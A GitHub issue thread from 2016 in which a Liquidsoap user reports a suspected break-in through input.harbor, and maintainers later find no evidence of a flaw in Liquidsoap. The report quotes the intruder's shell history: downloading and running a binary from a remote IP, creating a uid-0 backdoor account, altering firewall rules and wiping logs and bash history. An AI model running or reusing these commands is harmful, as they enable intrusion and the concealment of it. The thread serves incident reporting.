Potential security issue with input.harbor #17

Closed
maurodelazeri opened this issue Feb 2, 2016 · 7 comments

@maurodelazeri

Guys,
I have been using liquidsoap for some time. I have enabled "input.harbor" in my script; it is a dynamic script that always generates the user and password dynamically.
I saw that when "input.harbor" is enabled, my machine is invaded and the commands below are run on it. I formatted the machine 3 times and did several tests, and yes, the security hole that allows access to my machine is there when "input.harbor" is enabled.
Basically, what I noticed is that the invader installs a SYS flood on my machine, nothing more than that, but this is very serious.

Could anyone who has "input.harbor" enabled verify that? Check for the user "webll" in your /etc/passwd.

**IP where the connection comes from: 104.239.228.251**

Commands run on my machine at every access:
```
ps -ef
    2  cd /bin
    3  wget http://58.64.207.219:888/sshh
    4  chmod 0755 sshh
    5  ./sshh
    6  useradd -o -u 0 -g 0 -M -d /root -s /bin/bash webll
    7  passwd webll
    8  iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
    9  iptables -D INPUT -p tcp --dport 6379 -j DROP
   10  echo>ar/log/syslog
   11  echo>ar/log/messages
   12  echo>ar/logtpd/access_log
   13  echo>ar/logtpd/error_log0
   14  echo>ar/log/xferlog
   15  echo>ar/logcure
   16  echo>ar/log/auth.log
   17  echo>ar/log/user.log
   18  echo>ar/log/wtmp
   19  echo>ar/log/lastlog
   20  echo>ar/log/btmp
   21  echo>ar/run/utmp
   22  echo >/root/.bash_history
   23  history-c
```
```
live = input.harbor(
            id = "#{mount_name}",
            on_connect = live_start,
            on_disconnect = live_stop,
            buffer=8.,
            max=20.,
            icy = true,
            port = int_of_string(port2), # Dynamic port
            user = "#{mount_name}", # Dynamic mount point
            password = "#{streamingPasswordHarbor}", # Dynamic password
            "#{mount_name}")
```
```
root@liquidsoap:/home/ubuntu/live# uname -a
Linux liquidsoap 3.13.0-74-generic #118-Ubuntu SMP Thu Dec 17 22:52:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@liquidsoap:/home/ubuntu/live# liquidsoap --version
Liquidsoap 1.2.0+scm (git://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347)
Copyright (c) 2003-2016 Savonet team
Liquidsoap is open-source software, released under GNU General Public License.
See <http://liquidsoap.fm> for more information.
```
@toots
Member

toots commented Feb 2, 2016

Hi @maurodelazeri

Let's take that privately. Would you mind sending more info to security@liquidsoap.fm? In particular, how did you get those commands? Through the logs? If so, then could you send us the logs at the above email address?

Thanks!

@smimram
Member

smimram commented Feb 2, 2016

Also, do you run Liquidsoap as root? Do you have any other services running on the server? Is there any other interaction in Liquidsoap (or other programs)? How do you know for sure it is input.harbor?

@smimram changed the title from "###### huge security bug ######" to "Potential security issue with input.harbor" on Feb 2, 2016
@maurodelazeri
Author

I just sent an email to security@liquidsoap.fm, check it out.

@maurodelazeri
Author

Just to update:
Telnet is something that should be used carefully. I increased the number of characters in the password and, the most important change, I restricted the permissions of the user that uses liquidsoap.
I have watched it for a week and it did not happen again. Anyway, I believe that future improvements can be made to the use of harbor input.

@S54B32

S54B32 commented Mar 15, 2016

Was this security issue confirmed? Is there any news on this at all?

I'm sure you're aware but a potential security measure is to use IPTables or similar to restrict access to the harbor port to certain IPs or ranges of IPs.

@toots
Member

toots commented Mar 23, 2016

I was never able to reproduce or find any conclusive evidence of a security issue in liquidsoap's code. The stack running the compromised machine was quite complex, using node up front and running as root.

@toots
Member

toots commented May 25, 2016

I'm closing this one. Please re-open or file a new issue if/when needed.

@toots toots closed this as completed May 25, 2016